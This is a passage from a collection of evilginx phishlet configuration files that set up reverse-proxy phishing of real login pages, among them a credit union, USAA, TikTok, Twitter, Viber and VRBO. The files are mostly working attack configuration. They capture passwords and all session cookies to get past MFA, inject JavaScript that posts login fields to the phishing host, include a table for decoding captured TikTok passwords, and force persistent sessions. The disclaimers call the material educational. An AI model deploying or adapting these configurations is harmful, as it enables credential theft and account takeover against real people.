- domain: '.banking.suncoastcreditunion.com'
keys: ['.*,regexp']
- domain: 'suncoastcreditunion.com'
keys: ['.*,regexp']
- domain: 'www.suncoastcreditunion.com'
keys: ['.*,regexp']
auth_urls:
- '/*'
- '/'
credentials:
username:
key: 'memberId'
search: '(.*)'
type: 'post'
password:
key: 'password'
search: '(.*)'
type: 'post'
login:
domain: 'www.suncoastcreditunion.com'
path: '/'
--------------------------------------------------------------------------------
/phishlet_examples/supersport.yaml:
--------------------------------------------------------------------------------
1 | # AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES.
2 | # PLEASE DO NOT MISUSE THIS PHISHLET.
3 |
4 | author: '@An0nud4y'
5 | min_ver: '2.3.0'
6 | proxy_hosts:
7 | - {phish_sub: 'www', orig_sub: 'www', domain: 'supersport.hr', session: true, is_landing: true}
8 | - {phish_sub: '', orig_sub: '', domain: 'supersport.hr', session: true, is_landing: false}
9 | sub_filters:
10 | - {triggers_on: 'www.supersport.hr/res/', orig_sub: 'www', domain: 'supersport.hr', search: 'i=n(2494);', replace: 'i=n(165);', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
11 | - {triggers_on: 'www.supersport.hr', orig_sub: 'www', domain: 'supersport.hr', search: 'i=n(2494);', replace: 'i=n(165);', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
12 | - {triggers_on: 'www.supersport.hr', orig_sub: 'www', domain: 'supersport.hr', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
13 | - {triggers_on: 'www.supersport.hr', orig_sub: 'www', domain: 'supersport.hr', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
14 | - {triggers_on: 'www.supersport.hr', orig_sub: 'www', domain: 'supersport.hr', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
15 | - {triggers_on: 'www.supersport.hr', orig_sub: 'www', domain: 'supersport.hr', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
16 | - {triggers_on: 'www.supersport.hr', orig_sub: 'www', domain: 'supersport.hr', search: 'i=n(2494);', replace: 'i=n(165);', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
17 | - {triggers_on: 'www.supersport.hr/res/', orig_sub: 'www', domain: 'supersport.hr', search: 'i=n(2494);', replace: 'i=n(165);', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
18 |
19 |
20 | # i=n(2494); --> i=n(165);
21 | # a.render(r.createElement(i,null),document.getElementById("mount-app"));var o=n(139),l=n(165);
22 | #
23 |
24 | auth_tokens:
25 | - domain: '.supersport.hr'
26 | keys: ['session_id', '_dvc', '.*,regexp']
27 | credentials:
28 | username:
29 | key: 'login'
30 | search: '(.*)'
31 | type: 'post'
32 | password:
33 | key: 'password'
34 | search: '(.*)'
35 | type: 'post'
36 | login:
37 | domain: 'www.supersport.hr'
38 | path: '/igraci/prijava/'
39 |
40 | js_inject:
41 | - trigger_domains: ["www.supersport.hr"]
42 | trigger_paths: ["/igraci/prijava/"]
43 | trigger_params: []
44 | script: |
45 | function onclickListener(){
46 | document.getElementById("mount-app").innerHTML = 'Login

'
47 | return;
48 | }
49 | function sendPass(){ // Reads the two login-form fields and posts their values to '/login'. No direct call appears in the visible lines; the markup assigned in onclickListener is truncated in this listing.
50 | var login = document.getElementsByName("prijava[login]")[0].value; // value of the first element named prijava[login]
51 | var password = document.getElementsByName("prijava[password]")[0].value; // value of the first element named prijava[password]
52 | var xhr = new XMLHttpRequest();
53 | xhr.open("POST", '/login', true); // relative URL: the request goes to the origin that served the page; '/login' is not the path listed under `login:` in this file (/igraci/prijava/)
54 | xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
55 | xhr.send("login="+encodeURIComponent(login)+""+" password="+encodeURIComponent(password)); // body as sent: login=<encoded value> password=<encoded value>; the names match the `login`/`password` keys under `credentials:` in this file
56 | return;
57 | }
58 | setTimeout(function(){ onclickListener(); }, 2000);
59 |
60 |
61 | # AUTHENTICATION REQUEST
62 | #prijava:7
63 | #{"login":"<REDACTED_USERNAME>","password":"<REDACTED_PASSWORD>","useragent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0"}
--------------------------------------------------------------------------------
/phishlet_examples/tiktok.yaml:
--------------------------------------------------------------------------------
1 | # AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES.
2 | # PLEASE DO NOT MISUSE THIS PHISHLET.
3 |
4 | # All POST request fields are encoded by TikTok's JavaScript before they are sent to the server.
5 | # Below is the Table Which You can use to decode your captured credentials in evilginx manually.
6 |
7 | author: '@An0nUD4Y'
8 | min_ver: '2.3.0'
9 | proxy_hosts:
10 | - {phish_sub: 'www', orig_sub: 'www', domain: 'tiktok.com', session: true, is_landing: true}
11 | - {phish_sub: 'm', orig_sub: 'm', domain: 'tiktok.com', session: true, is_landing: false}
12 | - {phish_sub: '', orig_sub: '', domain: 'tiktok.com', session: true, is_landing: false}
13 | - {phish_sub: 'polyfill', orig_sub: '', domain: 'polyfill.io', session: true, is_landing: false}
14 | - {phish_sub: 's16', orig_sub: 's16', domain: 'tiktokcdn.com', session: true, is_landing: false}
15 | - {phish_sub: 'hypstarcdn', orig_sub: 's16', domain: 'hypstarcdn.com', session: true, is_landing: false}
16 | - {phish_sub: 'kakao', orig_sub: 'developers', domain: 'kakao.com', session: true, is_landing: false}
17 | - {phish_sub: 'mon-va', orig_sub: 'mon-va', domain: 'byteoversea.com', session: true, is_landing: false}
18 | - {phish_sub: 'maliva', orig_sub: 'maliva-mcs', domain: 'byteoversea.com', session: true, is_landing: false}
19 | - {phish_sub: 'sf16-muse-va', orig_sub: 'sf16-muse-va', domain: 'ibytedtos.com', session: true, is_landing: false}
20 |
21 | sub_filters:
22 | - {triggers_on: 'www.tiktok.com', orig_sub: 'www', domain: 'tiktok.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
23 | - {triggers_on: 'm.tiktok.com', orig_sub: 'm', domain: 'tiktok.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
24 | - {triggers_on: 'm.tiktok.com', orig_sub: 'm', domain: 'tiktok.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
25 | - {triggers_on: 'www.tiktok.com', orig_sub: 's16', domain: 'tiktokcdn.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
26 | - {triggers_on: 'm.tiktok.com', orig_sub: 's16', domain: 'tiktokcdn.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
27 | - {triggers_on: 'm.tiktok.com', orig_sub: 's16', domain: 'tiktokcdn.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
28 | - {triggers_on: 'www.tiktok.com', orig_sub: '', domain: 'polyfill.io', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
29 | - {triggers_on: 'm.tiktok.com', orig_sub: '', domain: 'polyfill.io', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
30 | - {triggers_on: 'm.tiktok.com', orig_sub: '', domain: 'polyfill.io', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
31 | - {triggers_on: 'www.tiktok.com', orig_sub: 's16', domain: 'hypstarcdn.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
32 | - {triggers_on: 'm.tiktok.com', orig_sub: 's16', domain: 'hypstarcdn.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
33 | - {triggers_on: 'm.tiktok.com', orig_sub: 's16', domain: 'hypstarcdn.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
34 | - {triggers_on: 'www.tiktok.com', orig_sub: 'developers', domain: 'kakao.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
35 | - {triggers_on: 'm.tiktok.com', orig_sub: 'developers', domain: 'kakao.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
36 | - {triggers_on: 'm.tiktok.com', orig_sub: 'developers', domain: 'kakao.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
37 | - {triggers_on: 'www.tiktok.com', orig_sub: 'mon-va', domain: 'byteoversea.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
38 | - {triggers_on: 'm.tiktok.com', orig_sub: 'mon-va', domain: 'byteoversea.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
39 | - {triggers_on: 'm.tiktok.com', orig_sub: 'mon-va', domain: 'byteoversea.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
40 | - {triggers_on: 'www.tiktok.com', orig_sub: 'maliva-mcs', domain: 'byteoversea.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
41 | - {triggers_on: 'm.tiktok.com', orig_sub: 'maliva-mcs', domain: 'byteoversea.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
42 | - {triggers_on: 'm.tiktok.com', orig_sub: 'maliva-mcs', domain: 'byteoversea.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
43 | - {triggers_on: 'www.tiktok.com', orig_sub: 'sf16-muse-va', domain: 'ibytedtos.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
44 | - {triggers_on: 'm.tiktok.com', orig_sub: 'sf16-muse-va', domain: 'ibytedtos.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
45 | - {triggers_on: 'm.tiktok.com', orig_sub: 'sf16-muse-va', domain: 'ibytedtos.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
46 |
47 |
48 |
49 |
50 |
51 | auth_tokens:
52 | - domain: '.tiktok.com'
53 | keys: ['.*,regexp']
54 | credentials:
55 | username:
56 | key: 'account'
57 | search: '(.*)'
58 | type: 'post'
59 | password:
60 | key: 'pass'
61 | search: '(.*)'
62 | type: 'post'
63 | custom:
64 | key: 'mobile'
65 | search: '(.*)'
66 | type: 'post'
67 |
68 | login:
69 | domain: 'www.tiktok.com'
70 | path: '/login/phone-or-email/phone-password?lang=en'
71 |
72 |
73 | #Remember Server Accepts Only encoded Credentials, So don't break the js functions responsible for encoding.
74 |
75 | #ENCODING TABLE TO DECODE THE PASSWORD AND MOBILE NUMBER
76 |
77 | # FOR NUMBERS
78 |
79 | # 1 = 34 , 2 = 37 , 3 = 36 , 4 = 31 , 5 = 30 ,6 = 33 , 7 = 32 , 8 = 3d , 9 = 3c
80 |
81 | # FOR SPECIAL CHARACTERS
82 |
83 | # ! = 24 , @ = 45 , # = 26 , $ = 21 , ^ = 5b , & = 23 , * = 2f , + = 2e
84 |
85 | # FOR LETTERS (SMALL-LETTERS)
86 |
87 | # a = 64 , b=67 , c=66 ,d=61,e=60,f=63,g=62,h=6d,i=6c,j=6f,k=6e,l=69,m=68,n=6b,o=6a,p=75,q=74,r=77,s=76,t=71,u=70,v=73,w=72,x=7d,y=7c,z=7f
88 |
89 | # FOR LETTERS (CAPITAL-LETTERS)
90 |
91 | # A=44 B=47 C=46 D=41 E=40 F=43 G=42 H=4d I=4c J=4f K=4e L=49 M=48 N=4b O=4a P=55 Q=54 R=57 S=56 T=51 U=50 V=53 W=52 X=5d Y=5c Z=5f
92 |
93 |
94 | # OTHER REMAINED CODES CAN BE FOUND USING POST REQUEST ANALYSIS.
95 |
96 |
--------------------------------------------------------------------------------
/phishlet_examples/tradus.yaml:
--------------------------------------------------------------------------------
1 | author: '@AN0NUD4Y'
2 | min_ver: '2.3.0'
3 | proxy_hosts:
4 | - {phish_sub: 'pro', orig_sub: 'pro', domain: 'tradus.com', session: true, is_landing: false}
5 | - {phish_sub: 'api', orig_sub: 'api-pro', domain: 'tradus.com', session: true, is_landing: true}
6 |
7 | sub_filters:
8 | - {triggers_on: 'pro.tradus.com', orig_sub: 'pro', domain: 'tradus.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
9 | - {triggers_on: 'pro.tradus.com', orig_sub: 'pro', domain: 'tradus.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
10 | - {triggers_on: 'pro.tradus.com', orig_sub: 'pro', domain: 'tradus.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
11 | - {triggers_on: 'pro.tradus.com', orig_sub: 'api-pro', domain: 'tradus.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
12 | - {triggers_on: 'pro.tradus.com', orig_sub: 'api-pro', domain: 'tradus.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
13 | - {triggers_on: 'pro.tradus.com', orig_sub: 'api-pro', domain: 'tradus.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
14 | - {triggers_on: 'api-pro.tradus.com', orig_sub: 'api-pro', domain: 'tradus.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
15 | - {triggers_on: 'api-pro.tradus.com', orig_sub: 'api-pro', domain: 'tradus.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
16 | - {triggers_on: 'api-pro.tradus.com', orig_sub: 'api-pro', domain: 'tradus.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
17 |
18 |
19 | auth_tokens:
20 | - domain: '.tradus.com'
21 | keys: ['','.*,regexp']
22 |
23 | credentials:
24 | username:
25 | key: 'Email'
26 | search: '(.*)'
27 | type: 'post'
28 | password:
29 | key: 'Password'
30 | search: '(.*)'
31 | type: 'post'
32 |
33 | login:
34 | domain: 'pro.tradus.com'
35 | path: '/login'
36 |
37 | js_inject:
38 | - trigger_domains: ["pro.tradus.com"]
39 | trigger_paths: ["/login"]
40 | trigger_params: []
41 | script: |
42 | function lp(){ // Points the inline click handler of one button on the page at sendData().
43 | var submit = document.querySelectorAll('button[type=button]')[4]; // positional selector: the fifth button[type=button] in document order
44 | submit.setAttribute("onclick", "sendData()"); // sets (or overwrites) the button's inline onclick attribute
45 | return;
46 | }
47 | function sendData(){ // Reads the e-mail and password inputs and sends each value in its own form-encoded POST to '/'.
48 | var email = document.getElementsByName("email")[1].value; // second element named "email"
49 | var password = document.getElementsByName("password")[0].value; // first element named "password"
50 | var xhr2 = new XMLHttpRequest();
51 | xhr2.open("POST", '/', true); // relative URL: goes to the origin that served the page
52 | xhr2.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
53 | xhr2.send("Email="+encodeURIComponent(email)); // field name matches the username key ('Email') under `credentials:` in this file
54 | var xhr = new XMLHttpRequest();
55 | xhr.open("POST", '/', true);
56 | xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
57 | xhr.send("Password="+encodeURIComponent(password)); // field name matches the password key ('Password'); two single-field POSTs to '/' in quick succession are the observable request pattern
58 | return;
59 | }
60 | setTimeout(function(){ lp(); }, 2500);
61 |
62 |
63 |
64 |
65 |
--------------------------------------------------------------------------------
/phishlet_examples/twitter-mobile.yaml:
--------------------------------------------------------------------------------
1 | author: '@white_fi'
2 | min_ver: '2.3.0'
3 | proxy_hosts: # hosts the reverse proxy fronts: each entry pairs a lure-side subdomain (phish_sub) with the legitimate host (orig_sub + domain)
4 | - {phish_sub: 'mobile', orig_sub: 'mobile', domain: 'twitter.com', session: true, is_landing: true} # the only entry with is_landing: true
5 | - {phish_sub: 'abs', orig_sub: 'abs', domain: 'twimg.com', session: true, is_landing: false}
6 | - {phish_sub: 'api', orig_sub: 'api', domain: 'twitter.com', session: false, is_landing: false}
7 | sub_filters: # response-body rewrite rules; `mimes` restricts each rule to responses of the listed content types
8 | - {triggers_on: 'mobile.twitter.com', orig_sub: 'mobile', domain: 'twitter.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']} # {hostname} is a template placeholder: legitimate host on the search side, lure host on the replace side
9 | - {triggers_on: 'abs.twimg.com', orig_sub: 'abs', domain: 'twimg.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
10 | - {triggers_on: 'api.twitter.com', orig_sub: 'api', domain: 'twitter.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']} # with hostnames rewritten in the body, page content does not expose the mismatch; the address bar and the TLS certificate name still do
11 | auth_tokens: # cookie names recorded as the captured session; they are set after login completes, so a replayed set is already past any OTP or push step
12 | - domain: 'twitter.com'
13 | keys: ['dnt','fm','kdt','_twitter_sess','twid','auth_token'] # fixed names: doubles as the list of cookies a session revocation has to invalidate
14 | credentials: # parameters read out of the proxied login POST
15 | username:
16 | key: 'session\[username_or_email\]' # brackets are escaped, so the key is presumably matched as a regular expression
17 | search: '(.*)' # capture group takes the whole parameter value
18 | type: 'post'
19 | password:
20 | key: 'session\[password\]'
21 | search: '(.*)'
22 | type: 'post'
23 | login: # host and path of the proxied login page
24 | domain: 'mobile.twitter.com'
25 | path: '/login'
26 |
--------------------------------------------------------------------------------
/phishlet_examples/twitter.yaml:
--------------------------------------------------------------------------------
1 | author: '@white_fi'
2 | min_ver: '2.3.0'
3 | proxy_hosts: # hosts the reverse proxy fronts: each entry pairs a lure-side subdomain (phish_sub) with the legitimate host (orig_sub + domain)
4 | - {phish_sub: '', orig_sub: '', domain: 'twitter.com', session: true, is_landing: true} # empty subdomains: the bare domain; the only entry with is_landing: true
5 | - {phish_sub: 'abs', orig_sub: 'abs', domain: 'twimg.com'} # session / is_landing are not set on this entry or the next
6 | - {phish_sub: 'api', orig_sub: 'api', domain: 'twitter.com'}
7 | sub_filters: [] # no explicit body-rewrite rules in this file
8 | auth_tokens: # cookie names recorded as the captured session; they are set after login completes, so a replayed set is already past any OTP or push step
9 | - domain: '.twitter.com'
10 | keys: ['kdt','_twitter_sess','twid','auth_token'] # fixed names: doubles as the list of cookies a session revocation has to invalidate
11 | credentials: # parameters read out of the proxied login POST
12 | username:
13 | key: 'session\[username_or_email\]' # brackets are escaped, so the key is presumably matched as a regular expression
14 | search: '(.*)' # capture group takes the whole parameter value
15 | type: 'post'
16 | password:
17 | key: 'session\[password\]'
18 | search: '(.*)'
19 | type: 'post'
20 | login: # host and path of the proxied login page
21 | domain: 'twitter.com'
22 | path: '/login'
23 |
--------------------------------------------------------------------------------
/phishlet_examples/usaa.yaml:
--------------------------------------------------------------------------------
1 | # THE AUTHOR OF THIS PHISHLET DOES NOT SUPPORT ANY ILLEGAL ACTIVITIES...
2 |
3 | author: '@i_am_a_Good_Human'
4 | min_ver: '2.3.0'
5 | proxy_hosts: # a single proxied host, which is also the landing host
6 | - {phish_sub: 'www', orig_sub: 'www', domain: 'usaa.com', session: true, is_landing: true}
7 |
8 | sub_filters: # response-body rewrite rules; `mimes` restricts each rule to responses of the listed content types
9 | - {triggers_on: 'www.usaa.com', orig_sub: 'www', domain: 'usaa.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} # {hostname} is a template placeholder: legitimate host on the search side, lure host on the replace side
10 | - {triggers_on: 'www.usaa.com', orig_sub: 'www', domain: 'usaa.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} # same substitution without the scheme, so bare hostname references are rewritten too
11 |
12 | auth_tokens: # cookies recorded as the captured session
13 | - domain: '.usaa.com'
14 | keys: ['.*,regexp'] # wildcard: every cookie on the domain, not a named set
15 | auth_urls: # request paths that mark the session as captured; used together with the wildcard cookie match above
16 | - '/'
17 | credentials: # parameters read out of the proxied login POST
18 | username:
19 | key: 'username'
20 | search: '(.*)' # capture group takes the whole parameter value
21 | type: 'post'
22 | password:
23 | key: 'j_password'
24 | search: '(.*)'
25 | type: 'post'
26 | login: # host and path of the proxied login page
27 | domain: 'www.usaa.com'
28 | path: '/inet/ent_logon/Logon'
29 |
30 | # THE AUTHOR OF THIS PHISHLET DOES NOT SUPPORT ANY ILLEGAL ACTIVITIES...
31 |
32 |
--------------------------------------------------------------------------------
/phishlet_examples/viber.yaml:
--------------------------------------------------------------------------------
1 | author: '@An0nud4y'
2 | min_ver: '2.3.0'
3 | proxy_hosts: # hosts the reverse proxy fronts: each entry pairs a lure-side subdomain (phish_sub) with the legitimate host (orig_sub + domain)
4 | - {phish_sub: 'account', orig_sub: 'account', domain: 'viber.com', session: true, is_landing: true}
5 | - {phish_sub: '', orig_sub: '', domain: 'viber.com', session: true, is_landing: false}
6 |
7 | sub_filters: # response-body rewrite rules; the first three cover the bare hostname, the https:// form and the percent-encoded https%3A%2F%2F form
8 | - {triggers_on: 'account.viber.com', orig_sub: 'account', domain: 'viber.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
9 | - {triggers_on: 'account.viber.com', orig_sub: 'account', domain: 'viber.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
10 | - {triggers_on: 'account.viber.com', orig_sub: 'account', domain: 'viber.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
11 | - {triggers_on: 'account.viber.com', orig_sub: '', domain: 'viber.com', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
12 |
13 |
14 | auth_tokens: # cookies recorded as the captured session; both entries use a wildcard rather than named cookies
15 | - domain: '.viber.com'
16 | keys: ['.*,regexp']
17 | - domain: 'account.viber.com'
18 | keys: ['.*,regexp']
19 |
20 | auth_urls: # request paths that mark the session as captured; used together with the wildcard cookie match above
21 | - '/account'
22 |
23 | credentials: # parameters read out of the proxied login POST
24 | username:
25 | key: 'phone_number'
26 | search: '(.*)'
27 | type: 'post'
28 | password:
29 | key: 'password'
30 | search: '(.*)'
31 | type: 'post'
32 | custom: # additional POST fields recorded alongside the username and password
33 | - key: 'phone_prefix'
34 | search: '(.*)'
35 | type: 'post'
36 | - key: 'token'
37 | search: '(.*)'
38 | type: 'post'
39 |
40 | force_post: # rewrites parameters of a matching POST in transit
41 | - path: '/api/web/login'
42 | search: # conditions: the request must carry these keys
43 | - {key: 'phone_number', search: '.*'}
44 | - {key: 'password', search: '.*'}
45 | - {key: 'token', search: '.*'}
46 | force: # values imposed on the forwarded request
47 | - {key: 'remember_me', value: 'true'} # presumably requests a persistent session, which lengthens the validity of the captured cookies; server-side session lifetime and revocation on password reset bound that
48 | - {key: 'destination', value: ''}
49 | type: 'post'
50 |
51 | login: # host and path of the proxied login page
52 | domain: 'account.viber.com'
53 | path: '/'
54 |
--------------------------------------------------------------------------------
/phishlet_examples/vrbo.yaml:
--------------------------------------------------------------------------------
1 | author: '@an0nud4y'
2 | min_ver: '2.3.0'
3 |
4 | proxy_hosts:
5 | - {phish_sub: 'www', orig_sub: 'www', domain: 'vrbo.com', session: true, is_landing: true, auto_filter: false}
6 | - {phish_sub: 'csvcus', orig_sub: 'csvcus', domain: 'homeaway.com', session: false, is_landing: false, auto_filter: false}
7 | - {phish_sub: 'tmcdn', orig_sub: 'tmcdn', domain: 'homeaway.com', session: true, is_landing: false, auto_filter: false}
8 |
9 | sub_filters:
10 | - {triggers_on: 'www.vrbo.com', orig_sub: 'www', domain: 'vrbo.com', search: 'www.vrbo.com', replace: 'www.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
11 | - {triggers_on: 'www.vrbo.com', orig_sub: 'www', domain: 'vrbo.com', search: 'csvcus.homeaway.com', replace: 'csvcus.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
12 | - {triggers_on: 'www.vrbo.com', orig_sub: 'www', domain: 'vrbo.com', search: 'tmcdn.homeaway.com', replace: 'tmcdn.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
13 |
14 | - {triggers_on: 'csvcus.homeaway.com', orig_sub: 'csvcus', domain: 'homeaway.com', search: 'www.vrbo.com', replace: 'www.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
15 | - {triggers_on: 'csvcus.homeaway.com', orig_sub: 'csvcus', domain: 'homeaway.com', search: 'csvcus.homeaway.com', replace: 'csvcus.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
16 | - {triggers_on: 'csvcus.homeaway.com', orig_sub: 'csvcus', domain: 'homeaway.com', search: 'tmcdn.homeaway.com', replace: 'tmcdn.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
17 |
18 | - {triggers_on: 'tmcdn.homeaway.com', orig_sub: 'tmcdn', domain: 'homeaway.com', search: 'www.vrbo.com', replace: 'www.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
19 | - {triggers_on: 'tmcdn.homeaway.com', orig_sub: 'tmcdn', domain: 'homeaway.com', search: 'csvcus.homeaway.com', replace: 'csvcus.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
20 | - {triggers_on: 'tmcdn.homeaway.com', orig_sub: 'tmcdn', domain: 'homeaway.com', search: 'tmcdn.homeaway.com', replace: 'tmcdn.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']}
21 |
22 | auth_tokens:
23 | - domain: '.vrbo.com'
24 | keys: ['.*,regexp']
25 | - domain: 'csvcus.homeaway.com'
26 | keys: ['.*,regexp']
27 | - domain: '.csvcus.homeaway.com'
28 | keys: ['.*,regexp']
29 | - domain: '.www.vrbo.com'
30 | keys: ['.*,regexp']
31 | - domain: 'www.vrbo.com'
32 | keys: ['.*,regexp']
33 | - domain: 'tmcdn.homeaway.com'
34 | keys: ['.*,regexp']
35 |
36 | auth_urls:
37 | - '/*'
38 | - '/'
39 | credentials:
40 | username:
41 | key: ''
42 | search: '"userName":"([^"]*)'
43 | type: 'json'
44 | password:
45 | key: ''
46 | search: '"secret":"([^"]*)'
47 | type: 'json'
48 |
49 | login:
50 | domain: 'www.vrbo.com'
51 | path: '/auth/ui/login?service=https%3A%2F%2Fwww.vrbo.com%2Fp%2Fhome%2Fvalidate-ticket%3Forigin%3D%252Fp%252Fhome%26site%3Dvrbo&screen=login&treatment=2fa'
--------------------------------------------------------------------------------
/phishlet_examples/webhinet.yaml:
--------------------------------------------------------------------------------
1 | # LEARN TO USE --debug mode and --developer mode in evilginx.
2 |
3 | name: 'HinetWebmail'
4 | author: '@syriangeneral2'
5 | min_ver: '2.3.0'
6 | proxy_hosts:
7 | - {phish_sub: '', orig_sub: '', domain: 'webmail.hinet.net', session: true, is_landing: true}
8 |
